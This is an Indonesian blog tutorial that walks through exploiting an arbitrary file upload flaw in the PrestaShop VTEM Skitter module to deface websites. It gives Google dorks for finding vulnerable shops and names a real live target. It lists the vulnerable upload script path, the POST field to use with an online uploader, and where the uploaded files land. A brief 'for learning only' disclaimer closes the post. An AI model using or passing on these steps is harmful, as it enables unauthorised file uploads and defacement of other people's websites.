Prestashop VTEM Skitter Arbitrary File Upload
Halo teman-teman pengunjung setia All Tutor Cyber. Selamat datang juga buat penunjung baru. Kali ini saya sendiri (Admin) Akan memberikan Prestashop VTEM Skitter Arbitrary File Upload
Baiklah untuk lebih jelasnya Teman-teman bisa membacanya di bawah ini
Bahan Bahan :
1. Dork : - inurl:modules/vtemskitter/
- inurl:modules/vtemskitter/ site:.es ( Site bisa diganti dengan domain negara lain )
Dorkingnya di Google Image
2. Explot : /[path]/modules/vtemskitter/uploadimage.php
Step by Step :
1. Dorking dulu ke Gugel image inurl:modules/vtemskitter/
Live Target : http://www.0centimos.es/modules/vtemskitter/img/lineas1.jpg
2. Pilih Salah Gambar Lalu Tekan "Open image in new tab"
3. Masukkan Exploitnya /modules/vtemskitter/uploadimage.php
Contoh http://www.0centimos.es/modules/vtemskitter/uploadimage.php
Vuln?! "Tulisannya error"
4. Masuk ke CSRF Online Lalu masukkan Target tadi
URL : "Target Deface"
Post File : userfile
5. Lalu Tekan "Lock Target!!!"
6. Pilih file yang akan di Upload => Tekan "Upload Gan!"
Kalau Work ada Tulisan Succsessnya dan Kalau Ga Work Tulisannya error
Hasil Live Target Tadi
Akses File upload : site.com/modules/vtemskitter/img/namafile
site.com/modules/vtemskitter/slides/namafile
Mudah Bukan ?!
Nitip Nick : GU3LT03M
Sekianlah Postingan Dari All Tutor Cyber tentang "Prestashop VTEM Skitter Arbitrary File Upload" Semoga Bisa Bermanfaat!.
Anda Sekarang Sedang Membaca Postingan "Prestashop VTEM Skitter Arbitrary File Upload" Dengan URL https://ryangueltoem.blogspot.co.id/2017/03/prestashop-vtem-skitter-arbitrary-file.html
Jika Ada Content Yang Berbau Pantest, Postingan Tersebut Hanya Untuk Pembelajaran. Admin Tidak Bertanggung Jawab Jika Terjadi Sesuatu Kepada Anda.
Sekian. Terimakasih
All Tutor Cyber
Tidak ada komentar:
Posting Komentar